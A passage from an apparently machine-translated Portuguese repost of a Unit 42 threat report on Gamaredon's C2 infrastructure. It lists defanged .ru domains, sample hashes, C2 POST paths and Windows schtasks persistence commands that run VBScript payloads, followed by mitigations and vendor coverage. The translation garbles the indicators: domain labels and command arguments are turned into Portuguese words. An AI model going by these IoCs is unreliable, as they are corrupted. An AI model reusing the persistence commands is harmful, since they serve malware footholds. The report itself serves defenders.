aliado.striman[.]ru
subsídio.hazari[.]ru
subsídio.telefar[.]ru
aliado.midiatr[. ]ru alocar54.anteriormente.bilorotka[
.]ru
aludido6.perfeito. bilorotka[.]ru
já67.perfeição.zanulor[.]ru
já8.perfeição.zanulor[.]ru
Esse padrão é ainda transportado para HTTP POSTs, arquivos e diretórios criados por amostras associadas:
Exemplo 1:
SHA256: 74cb6c1c644972298471bff286c310e48f6b35c88b5908dbddfa163c85debdee
deerflys.gortomalo[.]ru
C:\Windows\System32\schtasks.exe /CREATE /sc minuto /mo 11 /tn “deepmost” /tr “wscript.exe “C:\Users\Public\\deep-naked\deepmost.fly” counteract /create / /b /criminoso //e:VBScript /cracker counteract ” /F
POST /index.eef/deep-water613
Exemplo 2:
SHA256: ffb6d57d789d418ff1beb56111cc167276402a0059872236fa4d46bdfe1c0a13
pescoço de veado.gortomalo[.]ru
“C:\Windows\System32\schtasks.exe” /CREATE /sc minuto /mo 13 /tn “deep-worn” /tr “wscript.exe “C:\Users\Public\\deerberry\deep-worn.tmp” migalha /armário //b /aleijado //e:VBScript /migalha de maldição ” /F
POST /cache.jar/deerkill523
Como só vemos isso com alguns domínios, essa pode ser uma técnica empregada por um pequeno grupo de atores ou equipes. Ele sugere uma possível ligação entre as amostras do cluster 3 e aquelas do cluster 1 empregando um sistema de nomenclatura semelhante. Em contraste, não observamos a técnica de nomenclatura de grande número ou sequência aleatória do cluster 2 empregada em nenhum domínio do cluster 1.
Conclusão
A Gamaredon tem como alvo as vítimas ucranianas há quase uma década. Como as tensões internacionais em torno da Ucrânia continuam sem solução, as operações da Gamaredon provavelmente continuarão a se concentrar nos interesses russos na região. Este blog serve para destacar a importância da pesquisa sobre infraestrutura e malware adversários, bem como a colaboração da comunidade, a fim de detectar e se defender contra ameaças cibernéticas de estados-nações. Embora tenhamos mapeado três grandes clusters da infraestrutura Gamaredon atualmente ativa, acreditamos que há mais que ainda não foi descoberto. A Unidade 42 permanece vigilante no monitoramento da situação em evolução na Ucrânia e continua a buscar ativamente indicadores para colocar proteções para defender nossos clientes em qualquer lugar do mundo.
Proteções e Mitigações
A melhor defesa contra esse grupo de ameaças em evolução é uma postura de segurança que favorece a prevenção. Recomendamos que as organizações implementem o seguinte:
- Pesquise logs de rede e endpoint para qualquer evidência dos indicadores de comprometimento associados a esse grupo de ameaças.
- Garanta que as soluções de segurança cibernética estejam efetivamente bloqueando os IoCs de infraestrutura ativos identificados acima.
- Implemente uma solução de segurança de DNS para detectar e mitigar solicitações de DNS para infraestrutura C2 conhecida.
- Aplicar escrutínio adicional a todo o tráfego de rede que se comunica com AS 197695 ( Reg[.]ru ).
- Se você acha que pode ter sido comprometido ou tem um assunto urgente, entre em contato com a equipe de Resposta a Incidentes da Unidade 42 ou ligue gratuitamente para a América do Norte: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, ou Japão: +81.50.1790.0200.
Para os clientes da Palo Alto Networks, nossos produtos e serviços oferecem a seguinte cobertura associada a esta campanha:
O Cortex XDR protege os endpoints das técnicas de malware descritas neste blog.
O serviço de análise de ameaças baseado em nuvem WildFire identifica com precisão o malware descrito neste blog como malicioso.
A filtragem avançada de URL e a segurança DNS identificam todos os domínios de phishing e malware associados a este grupo como maliciosos.
Os usuários do serviço de inteligência de ameaças contextuais AutoFocus podem visualizar o malware associado a esses ataques usando a tag do Grupo Gamaredon.
A Palo Alto Networks compartilhou essas descobertas, incluindo amostras de arquivos e indicadores de comprometimento, com nossos colegas membros da Cyber Threat Alliance. Os membros do CTA usam essa inteligência para implantar proteções rapidamente para seus clientes e interromper sistematicamente os cibercriminosos mal-intencionados. Saiba mais sobre a Cyber Threat Alliance.
Indicadores de Compromisso
Uma lista dos domínios, endereços IP e hashes de malware está disponível no Unit 42 GitHub.
Recursos adicionais
Evolução do Conjunto de Ferramentas do Grupo Gamaredon – Unidade 42,
Resumo de Ameaças da Palo Alto Networks: Conflito Cibernético em andamento na Rússia e Ucrânia – Unidade 42,
Relatório Técnico da Palo Alto Networks sobre Armageddon / Gamaredon – Serviço de Segurança da Ucrânia
Tale of Gamaredon Infection – CERT-EE / Informações da Estônia Autoridade do sistema
Fonte: Unit42
Descubra mais sobre DCiber
Assine para receber os posts mais recentes por e-mail.
